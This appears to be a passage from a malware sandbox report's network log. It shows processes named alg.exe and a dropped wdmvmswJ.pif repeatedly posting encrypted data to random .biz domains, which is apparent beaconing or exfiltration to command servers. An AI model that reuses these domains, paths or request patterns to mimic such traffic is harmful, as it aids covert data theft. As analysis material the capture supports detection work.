                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: :DaW]voq)OpGAdGy4#UXtAk#"!0hvR&CRG|Hpit!-3gDAe1K?-&f`F>Z|[3'QlqqS|vhVY"-1gzxy<Bd;_?@(P6EeAl


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        60192.168.2.84977513.251.16.150804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.456578970 CET358OUTPOST /fkcgbfiiatbbgsse HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: qaynky.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.456615925 CET778OUTData Raw: 82 ae ef d3 64 6a dd e0 fe 02 00 00 68 e2 1d c9 25 63 b0 e2 a7 b3 c0 72 c9 05 96 d8 09 53 e1 df 7f 85 72 16 2c 41 26 5e 04 04 ef ac 2f 72 e7 b5 63 a9 98 03 7e ae eb b0 bc 22 69 e2 1d 54 bb 1c ae cd 83 42 ba 43 dc f3 08 9b b7 33 0c 11 4b e6 dd 5d
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: djh%crSr,A&^/rc~"iTBC3K]X*}d\S)O:xWjP08\/HW@L@@4=i#`:U`UKB{qv/->^cx/0_K,^dY^Uyt<E]
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:11.862967968 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=da725ec1ac65e5bac18ddcee66ed9243|173.254.250.82|1730445851|1730445851|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        61192.168.2.84977718.141.10.107804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:11.093044043 CET353OUTPOST /lfobofpdm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:11.093061924 CET802OUTData Raw: 98 0d 2e 3b f3 9c e0 4a 16 03 00 00 41 57 fa ef 98 14 56 ae 1a 98 18 cb 81 a5 59 c8 75 99 c2 21 8a c5 ea 36 9a 32 d5 bd 03 fd 5a c3 f2 70 b1 d1 b9 e8 78 cc 96 a2 49 55 60 00 64 0c 24 67 b3 b1 60 fb 74 7b aa 8b af b9 5d 45 4a 09 25 d4 08 cb 29 12
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: .;JAWVYu!62ZpxIU`d$g`t{]EJ%)X\'S4S~Q[X!R4,6aR*8fd[8K/136tc#tKf(*.1wg|-n^qW-x>l?B=^.g5>O
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.560075998 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:12 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=f3a8f69c2ee9a903e23db7f78bd7e9da|173.254.250.82|1730445852|1730445852|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        62192.168.2.84977844.221.84.105804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.077753067 CET350OUTPOST /wstlg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.077768087 CET778OUTData Raw: 22 9d ab 36 e4 99 30 77 fe 02 00 00 42 66 ad 39 b7 a7 3e ec 39 2f bf 86 dd 7b af 38 e8 c1 a4 2f 73 93 3c 07 ab 1a c1 80 64 69 48 d4 27 bf c5 42 b2 43 33 e7 69 76 5f 8b 1c dc 12 f9 c5 8c c9 6d 13 35 9a 39 58 c9 ce 5e 00 ab 07 17 d4 6a eb f7 79 a3
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: "60wBf9>9/{8/s<diH'BC3iv_m59X^jy/f}'*06y$g>[C]CA<D9XPdZ1sPT#^^7fi9aM\h?([~Up+f=5mPy4>[b)n9G6Kf|
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.732904911 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:12 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=92618c95f6596a4354292859ee99781c|173.254.250.82|1730445852|1730445852|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        63192.168.2.84977918.246.231.120804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.614274979 CET343OUTPOST /sn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vyome.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.614293098 CET802OUTData Raw: 81 56 05 5e 54 e1 9a 3c 16 03 00 00 94 2b e5 58 df d4 15 71 e8 67 45 71 1e c9 53 24 1d 59 94 a3 87 68 0a fc 39 66 47 f2 ac ac 94 d2 31 c7 3a da 48 1d 6d b6 48 fc 61 7c c6 26 1d ee 7e 4e 51 99 bf 0a 89 9e ee bb f1 c9 a5 83 ac 51 02 f3 66 0d 14 2c
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: V^T<+XqgEqS$Yh9fG1:HmHa|&~NQQf,SB1jSmOE?BcxD~*vJM4)*xmIEs$sZe1z+opbJ(A5%oSb:XE}m[|uZ
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.525759935 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=c758d7e7fcf2ec1018d8e01913ad54a3|173.254.250.82|1730445853|1730445853|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        64192.168.2.84978054.244.188.177804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.085887909 CET350OUTPOST /ohrgkx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.085908890 CET778OUTData Raw: 2c fe 2b 67 58 c6 2c 96 fe 02 00 00 a7 f7 2f f9 da f2 05 0c 74 f2 cf e6 1c 9a a4 41 2e 71 21 66 94 9b 1c 18 bf 61 ea 3b 18 dc 7b 31 ff 53 7c 8d 0f fb 4b 8c 6a 0b 92 e4 9a 82 e6 3d 66 ae 0f e2 34 91 88 95 10 40 05 00 6a 93 7e ff 86 9c ed 94 d7 ae
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ,+gX,/tA.q!fa;{1S|Kj=f4@j~ykVSYQxv7;Jya!B+d$F. ivs4_edGKuv_C`GE?xrM<kn&w#!tB9fV4b
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.917217016 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=e24240737c22977feae3f8ee92893f69|173.254.250.82|1730445853|1730445853|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        65192.168.2.84978118.208.156.248804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.840864897 CET357OUTPOST /ovauxeggsejjr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.840883017 CET802OUTData Raw: 4b 9e 0f 30 62 3d c6 89 16 03 00 00 2d 85 60 90 5b bf e6 8e 4b ae 16 b5 77 91 de 43 27 5f 70 cd 1c 14 75 90 33 69 da bc 05 79 09 7d 01 e3 6f 51 5e f1 a9 2c 7a 33 53 60 f1 0f eb 1d 90 97 b0 58 13 2b 45 0b c0 02 ec ad 75 98 19 d8 80 ae f1 a5 cc bd
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: K0b=-`[KwC'_pu3iy}oQ^,z3S`X+EuVC^mSn'Rv8E+HfG[-5-oA*qHJPry]KM{kkJX[pwq5uyx6Ojm<khgb9bO*
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.499131918 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:14 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d460f99b663a989b762fafb893fac4c9|173.254.250.82|1730445854|1730445854|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        66192.168.2.84978235.164.78.200804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.291610003 CET348OUTPOST /vekxop HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.291623116 CET778OUTData Raw: 35 13 6c f7 40 92 49 8f fe 02 00 00 ea c5 2d 1a ab fd e5 0b 34 a2 ae ff 66 9a d4 78 f4 5b 3a 48 4e 42 c6 0e 65 5d ce ad 02 6f 09 b2 3b d8 3e ce 0a 48 51 b9 6d af b0 13 ad c8 65 6b 41 c8 52 37 95 5a 00 21 61 f6 22 64 47 b3 d3 d5 ca dd 1e 4f 91 d9
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 5l@I-4fx[:HNBe]o;>HQmekAR7Z!a"dGOsJjEr<[LO(X\\c:X&v:Shq_my'+jmMAAK@}=Xh2kIc8YDrSqC\5*
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.129843950 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:15 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=c36b4ca13890bcef0ec806fa9fdf7790|173.254.250.82|1730445855|1730445855|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        67192.168.2.84978313.251.16.150804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.538604021 CET350OUTPOST /gblgywtx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.538624048 CET802OUTData Raw: 07 e7 b0 0a 09 58 38 1b 16 03 00 00 9c 4c 76 e4 31 6d b7 a8 93 07 b0 c5 a0 fe a6 f5 62 f2 98 64 f3 93 2e 67 32 28 55 14 f2 7b c5 4d 3f 32 60 10 14 9c 85 80 37 78 be 13 09 5e 4d 27 c7 cf 1c d1 36 94 e9 76 5d 44 ef 72 73 96 af cf 86 01 46 9f 62 f7
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: X8Lv1mbd.g2(U{M?2`7x^M'6v]DrsFb[7rq8xlGlIR-XxYh~V~3}q?JwiB`v|iB;'& mROCWCUE-pa=p8Fn!aO{mx)60


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        68192.168.2.84978413.251.16.150804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.136745930 CET347OUTPOST /bjgrt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.136853933 CET802OUTData Raw: ae 9b b9 1b 78 c9 c9 5d 16 03 00 00 17 46 42 85 ec 5f a0 24 f3 4b 13 db b7 8d 13 b3 90 cd 69 5a 70 9b 88 2b 3c d7 53 06 31 f0 47 eb 87 d3 d8 e0 ed a2 ed 0e 7d 15 3e 5c da 30 c2 0e 28 62 9e 31 fe 36 b7 84 95 60 ec f5 34 f4 53 62 42 8d df 5f d8 54
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: x]FB_$KiZp+<S1G}>\0(b16`4SbB_T!_Q[-gk%!0e~n8>p ^(B%$sg&uU,&uxTe6)xb2^{W>_e;Wf*Ov@LpFYFzv|D*ct'
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.561320066 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=a3a3b9c3c8c79292dd13d833c3250245|173.254.250.82|1730445856|1730445856|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        69192.168.2.8497853.94.10.34804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.828222990 CET354OUTPOST /tpndpotka HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.828263044 CET778OUTData Raw: a3 6c aa d1 a6 7b 6f e9 fe 02 00 00 fc 31 a8 e8 dc 8f 5e 80 ed 27 0d 42 ce ec 40 e3 df 54 73 8d 64 85 e5 ca 9d e1 7e ff e6 af cc 75 cd 25 b4 96 9f fb f7 80 a4 6f 33 c4 c0 63 00 25 b4 ea e9 d4 c6 c2 2d 0f 6f 49 4d c3 47 74 b1 1c 62 a9 6f d0 c7 c8
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: l{o1^'B@Tsd~u%o3c%-oIMGtbo"HVC'm7mCXC)/kK_$M1}by{hUmuvxzW3g7qHUfRz=V [^f+`zo8nkL4$6
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.492218971 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=622c1b39db08f0edd64cdef7623aa7d6|173.254.250.82|1730445856|1730445856|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        70192.168.2.84978613.251.16.150804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
